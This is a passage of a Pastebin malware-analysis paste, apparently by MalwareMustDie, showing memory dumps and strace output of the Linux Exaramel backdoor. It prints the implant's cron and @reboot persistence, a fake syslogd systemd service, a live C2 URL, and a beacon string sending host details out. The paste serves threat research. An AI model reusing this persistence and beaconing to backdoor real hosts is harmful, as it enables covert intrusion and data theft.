  576. 0xc42000f408  /bin/sh................./bin/sh.-c......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.
  577. 0xc42000f460  USER=nyan_apt....SHLVL=1.........HOME=/test.LOGNAME=test......._=./Exaramel...1.m.......
  578. 0xc42000f4b8  ........`.......... ....`.......... ..../dev/null.......... ....... ....................
  579. 0xc42000f510  /bin/sh./bin/sh.-c.whoami.......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.USER=nyan
  580. 0xc42000f568  _apt.....SHLVL=1.mung....HOME=/test..LOGNAME=test...._=./Exaramel........test../bin/uname
  581. 0xc42000f5c0  `.m............./usr/bin/uname../usr/bin/uname../bin/uname......`.......... ....`.......
  582. 0xc42000f618  ... ..../dev/null.......... ....... ............uname.................../bin/uname......
  583. 0xc42000f670  -a.TERM=vt100...SHELL=/bin/bash.HUSHLOGIN=FALSE.USER=test....SHLVL=1.nyan_apt%0A.HOME=/te
  584. 0xc42000f6c8  st.LOGNAME=test...._=./Exaramel..........`.....@.. ....... ....$.......... .............
  585. 0xc42000f720  P.. ....I.........m...............m...........nyan_apt%0A...............................
  586.   :
  587. 0xc42004a36f  .*/1 * * * * /test/Exaramel.@reboot /test/Exaramel.true.................................
  588. 0xc42004a4cf  ..`. ............................................Linux xxxxxxxxxxxxxxxxxxxxxxxxxx #1 SMP
  589. 0xc42004a527   xxxxxxxxxxxxxxxxxxxxxx GNU/Linux.......................................................
  590. 0xc42004c660  (crontab -l 2>/dev/null) | grep //test/Exaramel && echo 'true' || echo 'false'.........
  591.   :
  592. 0xc420053148  ........................................................................................
  593. 0xc4200531a0  /etc/systemd/system/syslogd.service.....................................................
  594. 0xc4200531f8  ........................................................................................
  595.   :
  596. 0xc4200533d3  ........................................................................................
  597. 0xc42005342b  .....................https://176.31.225.204/api/v1/auth/app.............................
  598. 0xc420053483   .............................q`........ ...............................................
  599.   :
  600. 0xc4200551e0  generation=1&guid=7248d60f-2a8f-453f-ac5b-19f5e0d7a3b0&platform=Linux+xxxxxxxxxxxxxxxxx
  601. 0xc420055238  xxxxxxx+%231+SMP+xxxxxxxxxxxxxx+x86_64+GNU%2FLinux%0A&version=1&whoami=nyan_apt%0A.....
  602.  
  603. // crontab tampering artifact
  604.  
  605. munmap(0x7f75952fb000, 4096)      = 0
  606. socket(PF_FILE, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 3
  607. connect(3, {sa_family=AF_FILE, path="/dev/log"}, 110) = 0
  608. sendto(3, "<78>Jan 10 07:55:51 crontab[2547]: (test) LIST (test)", 53, MSG_NOSIGNAL, NULL, 0) = 53
  609.  
  610.  
  611. ---
  612. # MalwareMustDie! - Don't spread malware - spread LOVE! @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!